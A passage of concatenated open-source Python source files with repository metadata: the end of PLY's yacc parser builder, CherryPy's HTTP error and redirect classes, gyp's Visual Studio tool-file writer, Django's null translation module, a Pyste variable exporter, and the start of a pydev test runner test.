self.log.error("'start' must be a string")
# Look for error handler
def get_error_func(self):
self.error_func = self.pdict.get('p_error')
# Validate the error function
def validate_error_func(self):
if self.error_func:
if isinstance(self.error_func,types.FunctionType):
ismethod = 0
elif isinstance(self.error_func, types.MethodType):
ismethod = 1
else:
self.log.error("'p_error' defined, but is not a function or method")
self.error = 1
return
eline = func_code(self.error_func).co_firstlineno
efile = func_code(self.error_func).co_filename
self.files[efile] = 1
if (func_code(self.error_func).co_argcount != 1+ismethod):
self.log.error("%s:%d: p_error() requires 1 argument",efile,eline)
self.error = 1
# Get the tokens map
def get_tokens(self):
tokens = self.pdict.get("tokens",None)
if not tokens:
self.log.error("No token list is defined")
self.error = 1
return
if not isinstance(tokens,(list, tuple)):
self.log.error("tokens must be a list or tuple")
self.error = 1
return
if not tokens:
self.log.error("tokens is empty")
self.error = 1
return
self.tokens = tokens
# Validate the tokens
def validate_tokens(self):
# Validate the tokens.
if 'error' in self.tokens:
self.log.error("Illegal token name 'error'. Is a reserved word")
self.error = 1
return
terminals = {}
for n in self.tokens:
if n in terminals:
self.log.warning("Token '%s' multiply defined", n)
terminals[n] = 1
# Get the precedence map (if any)
def get_precedence(self):
self.prec = self.pdict.get("precedence",None)
# Validate and parse the precedence map
def validate_precedence(self):
preclist = []
if self.prec:
if not isinstance(self.prec,(list,tuple)):
self.log.error("precedence must be a list or tuple")
self.error = 1
return
for level,p in enumerate(self.prec):
if not isinstance(p,(list,tuple)):
self.log.error("Bad precedence table")
self.error = 1
return
if len(p) < 2:
self.log.error("Malformed precedence entry %s. Must be (assoc, term, ..., term)",p)
self.error = 1
return
assoc = p[0]
if not isinstance(assoc,str):
self.log.error("precedence associativity must be a string")
self.error = 1
return
for term in p[1:]:
if not isinstance(term,str):
self.log.error("precedence items must be strings")
self.error = 1
return
preclist.append((term,assoc,level+1))
self.preclist = preclist
# Get all p_functions from the grammar
def get_pfunctions(self):
p_functions = []
for name, item in self.pdict.items():
if name[:2] != 'p_': continue
if name == 'p_error': continue
if isinstance(item,(types.FunctionType,types.MethodType)):
line = func_code(item).co_firstlineno
file = func_code(item).co_filename
p_functions.append((line,file,name,item.__doc__))
# Sort all of the actions by line number
p_functions.sort()
self.pfuncs = p_functions
# Validate all of the p_functions
def validate_pfunctions(self):
grammar = []
# Check for non-empty symbols
if len(self.pfuncs) == 0:
self.log.error("no rules of the form p_rulename are defined")
self.error = 1
return
for line, file, name, doc in self.pfuncs:
func = self.pdict[name]
if isinstance(func, types.MethodType):
reqargs = 2
else:
reqargs = 1
if func_code(func).co_argcount > reqargs:
self.log.error("%s:%d: Rule '%s' has too many arguments",file,line,func.__name__)
self.error = 1
elif func_code(func).co_argcount < reqargs:
self.log.error("%s:%d: Rule '%s' requires an argument",file,line,func.__name__)
self.error = 1
elif not func.__doc__:
self.log.warning("%s:%d: No documentation string specified in function '%s' (ignored)",file,line,func.__name__)
else:
try:
parsed_g = parse_grammar(doc,file,line)
for g in parsed_g:
grammar.append((name, g))
except SyntaxError:
e = sys.exc_info()[1]
self.log.error(str(e))
self.error = 1
# Looks like a valid grammar rule
# Mark the file in which defined.
self.files[file] = 1
# Secondary validation step that looks for p_ definitions that are not functions
# or functions that look like they might be grammar rules.
for n,v in self.pdict.items():
if n[0:2] == 'p_' and isinstance(v, (types.FunctionType, types.MethodType)): continue
if n[0:2] == 't_': continue
if n[0:2] == 'p_' and n != 'p_error':
self.log.warning("'%s' not defined as a function", n)
if ((isinstance(v,types.FunctionType) and func_code(v).co_argcount == 1) or
(isinstance(v,types.MethodType) and func_code(v).co_argcount == 2)):
try:
doc = v.__doc__.split(" ")
if doc[1] == ':':
self.log.warning("%s:%d: Possible grammar rule '%s' defined without p_ prefix",
func_code(v).co_filename, func_code(v).co_firstlineno,n)
except Exception:
pass
self.grammar = grammar
# -----------------------------------------------------------------------------
# yacc(module)
#
# Build a parser
# -----------------------------------------------------------------------------
def yacc(method='LALR', debug=yaccdebug, module=None, tabmodule=tab_module, start=None,
check_recursion=1, optimize=0, write_tables=1, debugfile=debug_file,outputdir='',
debuglog=None, errorlog = None, picklefile=None):
global parse # Reference to the parsing method of the last built parser
# If pickling is enabled, table files are not created
if picklefile:
write_tables = 0
if errorlog is None:
errorlog = PlyLogger(sys.stderr)
# Get the module dictionary used for the parser
if module:
_items = [(k,getattr(module,k)) for k in dir(module)]
pdict = dict(_items)
else:
pdict = get_caller_module_dict(2)
# Collect parser information from the dictionary
pinfo = ParserReflect(pdict,log=errorlog)
pinfo.get_all()
if pinfo.error:
raise YaccError("Unable to build parser")
# Check signature against table files (if any)
signature = pinfo.signature()
# Read the tables
try:
lr = LRTable()
if picklefile:
read_signature = lr.read_pickle(picklefile)
else:
read_signature = lr.read_table(tabmodule)
if optimize or (read_signature == signature):
try:
lr.bind_callables(pinfo.pdict)
parser = LRParser(lr,pinfo.error_func)
parse = parser.parse
return parser
except Exception:
e = sys.exc_info()[1]
errorlog.warning("There was a problem loading the table file: %s", repr(e))
except VersionError:
e = sys.exc_info()
errorlog.warning(str(e))
except Exception:
pass
if debuglog is None:
if debug:
debuglog = PlyLogger(open(debugfile,"w"))
else:
debuglog = NullLogger()
debuglog.info("Created by PLY version %s (http://www.dabeaz.com/ply)", __version__)
errors = 0
# Validate the parser information
if pinfo.validate_all():
raise YaccError("Unable to build parser")
if not pinfo.error_func:
errorlog.warning("no p_error() function is defined")
# Create a grammar object
grammar = Grammar(pinfo.tokens)
# Set precedence level for terminals
for term, assoc, level in pinfo.preclist:
try:
grammar.set_precedence(term,assoc,level)
except GrammarError:
e = sys.exc_info()[1]
errorlog.warning("%s",str(e))
# Add productions to the grammar
for funcname, gram in pinfo.grammar:
file, line, prodname, syms = gram
try:
grammar.add_production(prodname,syms,funcname,file,line)
except GrammarError:
e = sys.exc_info()[1]
errorlog.error("%s",str(e))
errors = 1
# Set the grammar start symbols
try:
if start is None:
grammar.set_start(pinfo.start)
else:
grammar.set_start(start)
except GrammarError:
e = sys.exc_info()[1]
errorlog.error(str(e))
errors = 1
if errors:
raise YaccError("Unable to build parser")
# Verify the grammar structure
undefined_symbols = grammar.undefined_symbols()
for sym, prod in undefined_symbols:
errorlog.error("%s:%d: Symbol '%s' used, but not defined as a token or a rule",prod.file,prod.line,sym)
errors = 1
unused_terminals = grammar.unused_terminals()
if unused_terminals:
debuglog.info("")
debuglog.info("Unused terminals:")
debuglog.info("")
for term in unused_terminals:
errorlog.warning("Token '%s' defined, but not used", term)
debuglog.info(" %s", term)
# Print out all productions to the debug log
if debug:
debuglog.info("")
debuglog.info("Grammar")
debuglog.info("")
for n,p in enumerate(grammar.Productions):
debuglog.info("Rule %-5d %s", n, p)
# Find unused non-terminals
unused_rules = grammar.unused_rules()
for prod in unused_rules:
errorlog.warning("%s:%d: Rule '%s' defined, but not used", prod.file, prod.line, prod.name)
if len(unused_terminals) == 1:
errorlog.warning("There is 1 unused token")
if len(unused_terminals) > 1:
errorlog.warning("There are %d unused tokens", len(unused_terminals))
if len(unused_rules) == 1:
errorlog.warning("There is 1 unused rule")
if len(unused_rules) > 1:
errorlog.warning("There are %d unused rules", len(unused_rules))
if debug:
debuglog.info("")
debuglog.info("Terminals, with rules where they appear")
debuglog.info("")
terms = list(grammar.Terminals)
terms.sort()
for term in terms:
debuglog.info("%-20s : %s", term, " ".join([str(s) for s in grammar.Terminals[term]]))
debuglog.info("")
debuglog.info("Nonterminals, with rules where they appear")
debuglog.info("")
nonterms = list(grammar.Nonterminals)
nonterms.sort()
for nonterm in nonterms:
debuglog.info("%-20s : %s", nonterm, " ".join([str(s) for s in grammar.Nonterminals[nonterm]]))
debuglog.info("")
if check_recursion:
unreachable = grammar.find_unreachable()
for u in unreachable:
errorlog.warning("Symbol '%s' is unreachable",u)
infinite = grammar.infinite_cycles()
for inf in infinite:
errorlog.error("Infinite recursion detected for symbol '%s'", inf)
errors = 1
unused_prec = grammar.unused_precedence()
for term, assoc in unused_prec:
errorlog.error("Precedence rule '%s' defined for unknown symbol '%s'", assoc, term)
errors = 1
if errors:
raise YaccError("Unable to build parser")
# Run the LRGeneratedTable on the grammar
if debug:
errorlog.debug("Generating %s tables", method)
lr = LRGeneratedTable(grammar,method,debuglog)
if debug:
num_sr = len(lr.sr_conflicts)
# Report shift/reduce and reduce/reduce conflicts
if num_sr == 1:
errorlog.warning("1 shift/reduce conflict")
elif num_sr > 1:
errorlog.warning("%d shift/reduce conflicts", num_sr)
num_rr = len(lr.rr_conflicts)
if num_rr == 1:
errorlog.warning("1 reduce/reduce conflict")
elif num_rr > 1:
errorlog.warning("%d reduce/reduce conflicts", num_rr)
# Write out conflicts to the output file
if debug and (lr.sr_conflicts or lr.rr_conflicts):
debuglog.warning("")
debuglog.warning("Conflicts:")
debuglog.warning("")
for state, tok, resolution in lr.sr_conflicts:
debuglog.warning("shift/reduce conflict for %s in state %d resolved as %s", tok, state, resolution)
already_reported = {}
for state, rule, rejected in lr.rr_conflicts:
if (state,id(rule),id(rejected)) in already_reported:
continue
debuglog.warning("reduce/reduce conflict in state %d resolved using rule (%s)", state, rule)
debuglog.warning("rejected rule (%s) in state %d", rejected,state)
errorlog.warning("reduce/reduce conflict in state %d resolved using rule (%s)", state, rule)
errorlog.warning("rejected rule (%s) in state %d", rejected, state)
already_reported[state,id(rule),id(rejected)] = 1
warned_never = []
for state, rule, rejected in lr.rr_conflicts:
if not rejected.reduced and (rejected not in warned_never):
debuglog.warning("Rule (%s) is never reduced", rejected)
errorlog.warning("Rule (%s) is never reduced", rejected)
warned_never.append(rejected)
# Write the table file if requested
if write_tables:
lr.write_table(tabmodule,outputdir,signature)
# Write a pickled version of the tables
if picklefile:
lr.pickle_table(picklefile,signature)
# Build the parser
lr.bind_callables(pinfo.pdict)
parser = LRParser(lr,pinfo.error_func)
parse = parser.parse
return parser
| mit |
OndinaHQ/Tracker | cherrypy/_cperror.py | 82 | 21755 | """Exception classes for CherryPy.
CherryPy provides (and uses) exceptions for declaring that the HTTP response
should be a status other than the default "200 OK". You can ``raise`` them like
normal Python exceptions. You can also call them and they will raise themselves;
this means you can set an :class:`HTTPError<cherrypy._cperror.HTTPError>`
or :class:`HTTPRedirect<cherrypy._cperror.HTTPRedirect>` as the
:attr:`request.handler<cherrypy._cprequest.Request.handler>`.
.. _redirectingpost:
Redirecting POST
================
When you GET a resource and are redirected by the server to another Location,
there's generally no problem since GET is both a "safe method" (there should
be no side-effects) and an "idempotent method" (multiple calls are no different
than a single call).
POST, however, is neither safe nor idempotent--if you
charge a credit card, you don't want to be charged twice by a redirect!
For this reason, *none* of the 3xx responses permit a user-agent (browser) to
resubmit a POST on redirection without first confirming the action with the user:
===== ================================= ===========
300 Multiple Choices Confirm with the user
301 Moved Permanently Confirm with the user
302 Found (Object moved temporarily) Confirm with the user
303 See Other GET the new URI--no confirmation
304 Not modified (for conditional GET only--POST should not raise this error)
305 Use Proxy Confirm with the user
307 Temporary Redirect Confirm with the user
===== ================================= ===========
However, browsers have historically implemented these restrictions poorly;
in particular, many browsers do not force the user to confirm 301, 302
or 307 when redirecting POST. For this reason, CherryPy defaults to 303,
which most user-agents appear to have implemented correctly. Therefore, if
you raise HTTPRedirect for a POST request, the user-agent will most likely
attempt to GET the new URI (without asking for confirmation from the user).
We realize this is confusing for developers, but it's the safest thing we
could do. You are of course free to raise ``HTTPRedirect(uri, status=302)``
or any other 3xx status if you know what you're doing, but given the
environment, we couldn't let any of those be the default.
Custom Error Handling
=====================
.. image:: /refman/cperrors.gif
Anticipated HTTP responses
--------------------------
The 'error_page' config namespace can be used to provide custom HTML output for
expected responses (like 404 Not Found). Supply a filename from which the output
will be read. The contents will be interpolated with the values %(status)s,
%(message)s, %(traceback)s, and %(version)s using plain old Python
`string formatting <http://www.python.org/doc/2.6.4/library/stdtypes.html#string-formatting-operations>`_.
::
_cp_config = {'error_page.404': os.path.join(localDir, "static/index.html")}
Beginning in version 3.1, you may also provide a function or other callable as
an error_page entry. It will be passed the same status, message, traceback and
version arguments that are interpolated into templates::
def error_page_402(status, message, traceback, version):
return "Error %s - Well, I'm very sorry but you haven't paid!" % status
cherrypy.config.update({'error_page.402': error_page_402})
Also in 3.1, in addition to the numbered error codes, you may also supply
"error_page.default" to handle all codes which do not have their own error_page entry.
Unanticipated errors
--------------------
CherryPy also has a generic error handling mechanism: whenever an unanticipated
error occurs in your code, it will call
:func:`Request.error_response<cherrypy._cprequest.Request.error_response>` to set
the response status, headers, and body. By default, this is the same output as
:class:`HTTPError(500) <cherrypy._cperror.HTTPError>`. If you want to provide
some other behavior, you generally replace "request.error_response".
Here is some sample code that shows how to display a custom error message and
send an e-mail containing the error::
from cherrypy import _cperror
def handle_error():
cherrypy.response.status = 500
cherrypy.response.body = ["<html><body>Sorry, an error occured</body></html>"]
sendMail('error@domain.com', 'Error in your web app', _cperror.format_exc())
class Root:
_cp_config = {'request.error_response': handle_error}
Note that you have to explicitly set :attr:`response.body <cherrypy._cprequest.Response.body>`
and not simply return an error message as a result.
"""
from cgi import escape as _escape
from sys import exc_info as _exc_info
from traceback import format_exception as _format_exception
from cherrypy._cpcompat import basestring, bytestr, iteritems, ntob, tonative, urljoin as _urljoin
from cherrypy.lib import httputil as _httputil
class CherryPyException(Exception):
"""A base class for CherryPy exceptions."""
pass
class TimeoutError(CherryPyException):
"""Exception raised when Response.timed_out is detected."""
pass
class InternalRedirect(CherryPyException):
"""Exception raised to switch to the handler for a different URL.
This exception will redirect processing to another path within the site
(without informing the client). Provide the new path as an argument when
raising the exception. Provide any params in the querystring for the new URL.
"""
def __init__(self, path, query_string=""):
import cherrypy
self.request = cherrypy.serving.request
self.query_string = query_string
if "?" in path:
# Separate any params included in the path
path, self.query_string = path.split("?", 1)
# Note that urljoin will "do the right thing" whether url is:
# 1. a URL relative to root (e.g. "/dummy")
# 2. a URL relative to the current path
# Note that any query string will be discarded.
path = _urljoin(self.request.path_info, path)
# Set a 'path' member attribute so that code which traps this
# error can have access to it.
self.path = path
CherryPyException.__init__(self, path, self.query_string)
class HTTPRedirect(CherryPyException):
"""Exception raised when the request should be redirected.
This exception will force a HTTP redirect to the URL or URL's you give it.
The new URL must be passed as the first argument to the Exception,
e.g., HTTPRedirect(newUrl). Multiple URLs are allowed in a list.
If a URL is absolute, it will be used as-is. If it is relative, it is
assumed to be relative to the current cherrypy.request.path_info.
If one of the provided URL is a unicode object, it will be encoded
using the default encoding or the one passed in parameter.
There are multiple types of redirect, from which you can select via the
``status`` argument. If you do not provide a ``status`` arg, it defaults to
303 (or 302 if responding with HTTP/1.0).
Examples::
raise cherrypy.HTTPRedirect("")
raise cherrypy.HTTPRedirect("/abs/path", 307)
raise cherrypy.HTTPRedirect(["path1", "path2?a=1&b=2"], 301)
See :ref:`redirectingpost` for additional caveats.
"""
status = None
"""The integer HTTP status code to emit."""
urls = None
"""The list of URL's to emit."""
encoding = 'utf-8'
"""The encoding when passed urls are not native strings"""
def __init__(self, urls, status=None, encoding=None):
import cherrypy
request = cherrypy.serving.request
if isinstance(urls, basestring):
urls = [urls]
abs_urls = []
for url in urls:
url = tonative(url, encoding or self.encoding)
# Note that urljoin will "do the right thing" whether url is:
# 1. a complete URL with host (e.g. "http://www.example.com/test")
# 2. a URL relative to root (e.g. "/dummy")
# 3. a URL relative to the current path
# Note that any query string in cherrypy.request is discarded.
url = _urljoin(cherrypy.url(), url)
abs_urls.append(url)
self.urls = abs_urls
# RFC 2616 indicates a 301 response code fits our goal; however,
# browser support for 301 is quite messy. Do 302/303 instead. See
# http://www.alanflavell.org.uk/www/post-redirect.html
if status is None:
if request.protocol >= (1, 1):
status = 303
else:
status = 302
else:
status = int(status)
if status < 300 or status > 399:
raise ValueError("status must be between 300 and 399.")
self.status = status
CherryPyException.__init__(self, abs_urls, status)
def set_response(self):
"""Modify cherrypy.response status, headers, and body to represent self.
CherryPy uses this internally, but you can also use it to create an
HTTPRedirect object and set its output without *raising* the exception.
"""
import cherrypy
response = cherrypy.serving.response
response.status = status = self.status
if status in (300, 301, 302, 303, 307):
response.headers['Content-Type'] = "text/html;charset=utf-8"
# "The ... URI SHOULD be given by the Location field
# in the response."
response.headers['Location'] = self.urls[0]
# "Unless the request method was HEAD, the entity of the response
# SHOULD contain a short hypertext note with a hyperlink to the
# new URI(s)."
msg = {300: "This resource can be found at <a href='%s'>%s</a>.",
301: "This resource has permanently moved to <a href='%s'>%s</a>.",
302: "This resource resides temporarily at <a href='%s'>%s</a>.",
303: "This resource can be found at <a href='%s'>%s</a>.",
307: "This resource has moved temporarily to <a href='%s'>%s</a>.",
}[status]
msgs = [msg % (u, u) for u in self.urls]
response.body = ntob("<br />\n".join(msgs), 'utf-8')
# Previous code may have set C-L, so we have to reset it
# (allow finalize to set it).
response.headers.pop('Content-Length', None)
elif status == 304:
# Not Modified.
# "The response MUST include the following header fields:
# Date, unless its omission is required by section 14.18.1"
# The "Date" header should have been set in Response.__init__
# "...the response SHOULD NOT include other entity-headers."
for key in ('Allow', 'Content-Encoding', 'Content-Language',
'Content-Length', 'Content-Location', 'Content-MD5',
'Content-Range', 'Content-Type', 'Expires',
'Last-Modified'):
if key in response.headers:
del response.headers[key]
# "The 304 response MUST NOT contain a message-body."
response.body = None
# Previous code may have set C-L, so we have to reset it.
response.headers.pop('Content-Length', None)
elif status == 305:
# Use Proxy.
# self.urls[0] should be the URI of the proxy.
response.headers['Location'] = self.urls[0]
response.body = None
# Previous code may have set C-L, so we have to reset it.
response.headers.pop('Content-Length', None)
else:
raise ValueError("The %s status code is unknown." % status)
def __call__(self):
"""Use this exception as a request.handler (raise self)."""
raise self
def clean_headers(status):
"""Remove any headers which should not apply to an error response."""
import cherrypy
response = cherrypy.serving.response
# Remove headers which applied to the original content,
# but do not apply to the error page.
respheaders = response.headers
for key in ["Accept-Ranges", "Age", "ETag", "Location", "Retry-After",
"Vary", "Content-Encoding", "Content-Length", "Expires",
"Content-Location", "Content-MD5", "Last-Modified"]:
if key in respheaders:
del respheaders[key]
if status != 416:
# A server sending a response with status code 416 (Requested
# range not satisfiable) SHOULD include a Content-Range field
# with a byte-range-resp-spec of "*". The instance-length
# specifies the current length of the selected resource.
# A response with status code 206 (Partial Content) MUST NOT
# include a Content-Range field with a byte-range- resp-spec of "*".
if "Content-Range" in respheaders:
del respheaders["Content-Range"]
class HTTPError(CherryPyException):
"""Exception used to return an HTTP error code (4xx-5xx) to the client.
This exception can be used to automatically send a response using a http status
code, with an appropriate error page. It takes an optional
``status`` argument (which must be between 400 and 599); it defaults to 500
("Internal Server Error"). It also takes an optional ``message`` argument,
which will be returned in the response body. See
`RFC 2616 <http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.4>`_
for a complete list of available error codes and when to use them.
Examples::
raise cherrypy.HTTPError(403)
raise cherrypy.HTTPError("403 Forbidden", "You are not allowed to access this resource.")
"""
status = None
"""The HTTP status code. May be of type int or str (with a Reason-Phrase)."""
code = None
"""The integer HTTP status code."""
reason = None
"""The HTTP Reason-Phrase string."""
def __init__(self, status=500, message=None):
self.status = status
try:
self.code, self.reason, defaultmsg = _httputil.valid_status(status)
except ValueError:
raise self.__class__(500, _exc_info()[1].args[0])
if self.code < 400 or self.code > 599:
raise ValueError("status must be between 400 and 599.")
# See http://www.python.org/dev/peps/pep-0352/
# self.message = message
self._message = message or defaultmsg
CherryPyException.__init__(self, status, message)
def set_response(self):
"""Modify cherrypy.response status, headers, and body to represent self.
CherryPy uses this internally, but you can also use it to create an
HTTPError object and set its output without *raising* the exception.
"""
import cherrypy
response = cherrypy.serving.response
clean_headers(self.code)
# In all cases, finalize will be called after this method,
# so don't bother cleaning up response values here.
response.status = self.status
tb = None
if cherrypy.serving.request.show_tracebacks:
tb = format_exc()
response.headers['Content-Type'] = "text/html;charset=utf-8"
response.headers.pop('Content-Length', None)
content = ntob(self.get_error_page(self.status, traceback=tb,
message=self._message), 'utf-8')
response.body = content
_be_ie_unfriendly(self.code)
def get_error_page(self, *args, **kwargs):
return get_error_page(*args, **kwargs)
def __call__(self):
"""Use this exception as a request.handler (raise self)."""
raise self
class NotFound(HTTPError):
"""Exception raised when a URL could not be mapped to any handler (404).
This is equivalent to raising
:class:`HTTPError("404 Not Found") <cherrypy._cperror.HTTPError>`.
"""
def __init__(self, path=None):
if path is None:
import cherrypy
request = cherrypy.serving.request
path = request.script_name + request.path_info
self.args = (path,)
HTTPError.__init__(self, 404, "The path '%s' was not found." % path)
_HTTPErrorTemplate = '''<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></meta>
<title>%(status)s</title>
<style type="text/css">
#powered_by {
margin-top: 20px;
border-top: 2px solid black;
font-style: italic;
}
#traceback {
color: red;
}
</style>
</head>
<body>
<h2>%(status)s</h2>
<p>%(message)s</p>
<pre id="traceback">%(traceback)s</pre>
<div id="powered_by">
<span>Powered by <a href="http://www.cherrypy.org">CherryPy %(version)s</a></span>
</div>
</body>
</html>
'''
def get_error_page(status, **kwargs):
"""Return an HTML page, containing a pretty error response.
status should be an int or a str.
kwargs will be interpolated into the page template.
"""
import cherrypy
try:
code, reason, message = _httputil.valid_status(status)
except ValueError:
raise cherrypy.HTTPError(500, _exc_info()[1].args[0])
# We can't use setdefault here, because some
# callers send None for kwarg values.
if kwargs.get('status') is None:
kwargs['status'] = "%s %s" % (code, reason)
if kwargs.get('message') is None:
kwargs['message'] = message
if kwargs.get('traceback') is None:
kwargs['traceback'] = ''
if kwargs.get('version') is None:
kwargs['version'] = cherrypy.__version__
for k, v in iteritems(kwargs):
if v is None:
kwargs[k] = ""
else:
kwargs[k] = _escape(kwargs[k])
# Use a custom template or callable for the error page?
pages = cherrypy.serving.request.error_page
error_page = pages.get(code) or pages.get('default')
if error_page:
try:
if hasattr(error_page, '__call__'):
return error_page(**kwargs)
else:
data = open(error_page, 'rb').read()
return tonative(data) % kwargs
except:
e = _format_exception(*_exc_info())[-1]
m = kwargs['message']
if m:
m += "<br />"
m += "In addition, the custom error page failed:\n<br />%s" % e
kwargs['message'] = m
return _HTTPErrorTemplate % kwargs
_ie_friendly_error_sizes = {
400: 512, 403: 256, 404: 512, 405: 256,
406: 512, 408: 512, 409: 512, 410: 256,
500: 512, 501: 512, 505: 512,
}
def _be_ie_unfriendly(status):
import cherrypy
response = cherrypy.serving.response
# For some statuses, Internet Explorer 5+ shows "friendly error
# messages" instead of our response.body if the body is smaller
# than a given size. Fix this by returning a body over that size
# (by adding whitespace).
# See http://support.microsoft.com/kb/q218155/
s = _ie_friendly_error_sizes.get(status, 0)
if s:
s += 1
# Since we are issuing an HTTP error status, we assume that
# the entity is short, and we should just collapse it.
content = response.collapse_body()
l = len(content)
if l and l < s:
# IN ADDITION: the response must be written to IE
# in one chunk or it will still get replaced! Bah.
content = content + (ntob(" ") * (s - l))
response.body = content
response.headers['Content-Length'] = str(len(content))
def format_exc(exc=None):
"""Return exc (or sys.exc_info if None), formatted."""
try:
if exc is None:
exc = _exc_info()
if exc == (None, None, None):
return ""
import traceback
return "".join(traceback.format_exception(*exc))
finally:
del exc
def bare_error(extrabody=None):
"""Produce status, headers, body for a critical error.
Returns a triple without calling any other questionable functions,
so it should be as error-free as possible. Call it from an HTTP server
if you get errors outside of the request.
If extrabody is None, a friendly but rather unhelpful error message
is set in the body. If extrabody is a string, it will be appended
as-is to the body.
"""
# The whole point of this function is to be a last line-of-defense
# in handling errors. That is, it must not raise any errors itself;
# it cannot be allowed to fail. Therefore, don't add to it!
# In particular, don't call any other CP functions.
body = ntob("Unrecoverable error in the server.")
if extrabody is not None:
if not isinstance(extrabody, bytestr):
extrabody = extrabody.encode('utf-8')
body += ntob("\n") + extrabody
return (ntob("500 Internal Server Error"),
[(ntob('Content-Type'), ntob('text/plain')),
(ntob('Content-Length'), ntob(str(len(body)),'ISO-8859-1'))],
[body])
| gpl-3.0 |
gugarosa/app_h | node_modules/node-ninja/gyp/pylib/gyp/MSVSToolFile.py | 2736 | 1804 | # Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Visual Studio project reader/writer."""
import gyp.common
import gyp.easy_xml as easy_xml
class Writer(object):
"""Visual Studio XML tool file writer."""
def __init__(self, tool_file_path, name):
"""Initializes the tool file.
Args:
tool_file_path: Path to the tool file.
name: Name of the tool file.
"""
self.tool_file_path = tool_file_path
self.name = name
self.rules_section = ['Rules']
def AddCustomBuildRule(self, name, cmd, description,
additional_dependencies,
outputs, extensions):
"""Adds a rule to the tool file.
Args:
name: Name of the rule.
description: Description of the rule.
cmd: Command line of the rule.
additional_dependencies: other files which may trigger the rule.
outputs: outputs of the rule.
extensions: extensions handled by the rule.
"""
rule = ['CustomBuildRule',
{'Name': name,
'ExecutionDescription': description,
'CommandLine': cmd,
'Outputs': ';'.join(outputs),
'FileExtensions': ';'.join(extensions),
'AdditionalDependencies':
';'.join(additional_dependencies)
}]
self.rules_section.append(rule)
def WriteIfChanged(self):
"""Writes the tool file."""
content = ['VisualStudioToolFile',
{'Version': '8.00',
'Name': self.name
},
self.rules_section
]
easy_xml.WriteXmlIfChanged(content, self.tool_file_path,
encoding="Windows-1252")
| gpl-3.0 |
jarvys/django-1.7-jdb | django/utils/translation/trans_null.py | 84 | 1536 | # These are versions of the functions in django.utils.translation.trans_real
# that don't actually do anything. This is purely for performance, so that
# settings.USE_I18N = False can use this module rather than trans_real.py.
from django.conf import settings
from django.utils.encoding import force_text
from django.utils.safestring import mark_safe, SafeData
def ngettext(singular, plural, number):
if number == 1:
return singular
return plural
ngettext_lazy = ngettext
def ungettext(singular, plural, number):
return force_text(ngettext(singular, plural, number))
def pgettext(context, message):
return ugettext(message)
def npgettext(context, singular, plural, number):
return ungettext(singular, plural, number)
activate = lambda x: None
deactivate = deactivate_all = lambda: None
get_language = lambda: settings.LANGUAGE_CODE
get_language_bidi = lambda: settings.LANGUAGE_CODE in settings.LANGUAGES_BIDI
check_for_language = lambda x: True
def gettext(message):
if isinstance(message, SafeData):
return mark_safe(message)
return message
def ugettext(message):
return force_text(gettext(message))
gettext_noop = gettext_lazy = _ = gettext
def to_locale(language):
p = language.find('-')
if p >= 0:
return language[:p].lower() + '_' + language[p + 1:].upper()
else:
return language.lower()
def get_language_from_request(request, check_path=False):
return settings.LANGUAGE_CODE
def get_language_from_path(request):
return None
| bsd-3-clause |
rkq/cxxexp | third-party/src/boost_1_56_0/libs/python/pyste/src/Pyste/VarExporter.py | 54 | 1313 | # Copyright Bruno da Silva de Oliveira 2003. Use, modification and
# distribution is subject to the Boost Software License, Version 1.0.
# (See accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
from Exporter import Exporter
from settings import *
import utils
#==============================================================================
# VarExporter
#==============================================================================
class VarExporter(Exporter):
'''Exports a global variable.
'''
def __init__(self, info):
Exporter.__init__(self, info)
def Export(self, codeunit, exported_names):
if self.info.exclude: return
decl = self.GetDeclaration(self.info.name)
if not decl.type.const:
msg = '---> Warning: The global variable "%s" is non-const:\n' \
' changes in Python will not reflect in C++.'
print msg % self.info.name
print
rename = self.info.rename or self.info.name
code = self.INDENT + namespaces.python
code += 'scope().attr("%s") = %s;\n' % (rename, self.info.name)
codeunit.Write('module', code)
def Order(self):
return 0, self.info.name
def Name(self):
return self.info.name
| mit |
lucafavatella/intellij-community | python/helpers/pydev/tests_pydevd_runfiles/test_runfiles.py | 21 | 19411 | import os.path
import sys
IS_JYTHON = sys.platform.find('java') != -1
try:
this_file_name = __file__
except NameError:
# stupid jython. plain old __file__ isnt working for some reason
import test_runfiles #@UnresolvedImport - importing the module itself
this_file_name = test_runfiles.__file__
desired_runfiles_path = os.path.normpath(os.path.dirname(this_file_name) + "/..")
sys.path.insert(0, desired_runfiles_path)
from _pydev_runfiles import pydev_runfiles_unittest
from _pydev_runfiles import pydev_runfiles_xml_rpc
from _pydevd_bundle import pydevd_io
#remove existing pydev_runfiles from modules (if any), so that we can be sure we have the correct version
if 'pydev_runfiles' in sys.modules:
del sys.modules['pydev_runfiles']
if '_pydev_runfiles.pydev_runfiles' in sys.modules:
del sys.modules['_pydev_runfiles.pydev_runfiles']
from _pydev_runfiles import pydev_runfiles
import unittest
import tempfile
import re
try:
set
except:
from sets import Set as set
#this is an early test because it requires the sys.path changed
orig_syspath = sys.path
a_file = pydev_runfiles.__file__
pydev_runfiles.PydevTestRunner(pydev_runfiles.Configuration(files_or_dirs=[a_file]))
file_dir = os.path.dirname(os.path.dirname(a_file))
assert file_dir in sys.path
sys.path = orig_syspath[:]
#remove it so that we leave it ok for other tests
sys.path.remove(desired_runfiles_path)
class RunfilesTest(unittest.TestCase):
def _setup_scenario(
self,
path,
include_tests=None,
tests=None,
files_to_tests=None,
exclude_files=None,
exclude_tests=None,
include_files=None,
):
self.MyTestRunner = pydev_runfiles.PydevTestRunner(
pydev_runfiles.Configuration(
files_or_dirs=path,
include_tests=include_tests,
verbosity=1,
tests=tests,
files_to_tests=files_to_tests,
exclude_files=exclude_files,
exclude_tests=exclude_tests,
include_files=include_files,
)
)
self.files = self.MyTestRunner.find_import_files()
self.modules = self.MyTestRunner.find_modules_from_files(self.files)
self.all_tests = self.MyTestRunner.find_tests_from_modules(self.modules)
self.filtered_tests = self.MyTestRunner.filter_tests(self.all_tests)
def setUp(self):
self.file_dir = [os.path.abspath(os.path.join(desired_runfiles_path, 'tests_runfiles/samples'))]
self._setup_scenario(self.file_dir, None)
def test_suite_used(self):
for suite in self.all_tests + self.filtered_tests:
